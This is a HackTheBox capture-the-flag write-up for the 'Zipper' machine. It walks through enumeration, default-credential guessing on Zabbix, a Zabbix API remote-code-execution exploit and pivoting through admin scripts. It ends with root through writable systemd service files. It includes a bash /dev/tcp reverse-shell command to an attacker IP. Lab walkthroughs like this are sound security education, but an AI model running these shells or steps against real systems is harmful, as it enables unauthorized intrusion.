HackTheBox - Zipper

Nmap scan results (Basic and all port)

nmap -sC -sV -oA nmap-zipper zipper.htb
nmap -A -T4 -p- -oA nmap-allport zipper.htb

Directory scanning using gobuster

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://zipper.htb/ -o gobuster-dir-scan.out

After directory scanning, we can perform a extension based scan (Extensions like php,html,bak,txt)

Zabbix is an open-source monitoring software tool for diverse IT components, including networks, servers, virtual machines and cloud services. Zabbix provides monitoring metrics, among others network utilization, CPU load and disk space consumption.

Zabbix is running at /zabbix

We can run a background subdomain enumeration scan using wfuzz and then proceed with this new zabbix directory found. There are a lot of known vulnerabilities present (searchsploit in Kali)

Version Identified for Zabbix : Zabbix 3.0.21

Known vulnerabilities for Zabbix 3.0.x

Guessing username and creds for Zabbix

I tried zipper:zipper, then zabbix:zabbix and bunch of default usernames and passwords. Then I tried zapper:zapper and I got this unique error.

Looks like a valid set of credentials. Now that we have credentials, we can try that API JSON-RPC Exploit. Let's download and modify the script.

We need username, password and hostID to get RCE on the machine. Let's find the hostID.

Username: zapper , Password: zapper and HostID: 10106

Remote Code Execution with API JSON-RPC

Now let's get a reverse shell.

bash -c "bash -i >& /dev/tcp/10.10.14.3/4444 0>&1"

Searching for MySQL passwords

Using find command to search all the files containing word "zabbix" in it.

find / -name "*zabbix*" -type f 2>/dev/null

Got username and password for zabbix server's database. We are in a Docker Container.

We can use this credentials to connect to the MySQL database and then we try to get admin's password or change admin's password.

Now we can access Admin Panel using our credentials. Using this we can try to access or even execute scripts on actual target machine.

Admin Access on Zabbix (Pivoting)

We can now create a new script and perform Code Execution on the target computer. But we get the following error when trying to execute script on Zabbix's Agent.

We can fix this by going to Configuration -> Hosts and changing the host from 127.0.0.1 to 10.10.10.108

Update the file and create/edit the script for command execution.

Getting Reverse shell by using a malicious script

Then go to Monitoring -> Latest data and filter the results based on Zabbix servers.

And we get a reverse shell as zabbix user.

Privilege Escalation (Misconfigured Permissions on service/timer files)

There's a backup script running a 7z command using a password. Let's grab that password and try to change the user to zapper.

We have a file named zabbix-service having setuid permissions. After running strings on that binary, we get the following output.

So the script reloads the daemon and then starts zabbix-agent service. So let's keep that in mind and proceed.

Checking the /etc/systemd/system directory for .service files.

We have read/write privileges on purge-backups.service and purge-backups.timer files.

We can exploit this. Check the following links for a detailed explanation.

https://null-byte.wonderhowto.com/how-to/create-service-files-with-systemd-0163062/
https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49
https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-service-files

So after the daemon reloads and starts zabbix-agent.service, the /tmp/script.sh file will get executed and as this file contains a reverse shell, we will get root access (zabbix-service binary runs as root because of the setuid permissions)

Note: First stop the service and then start it again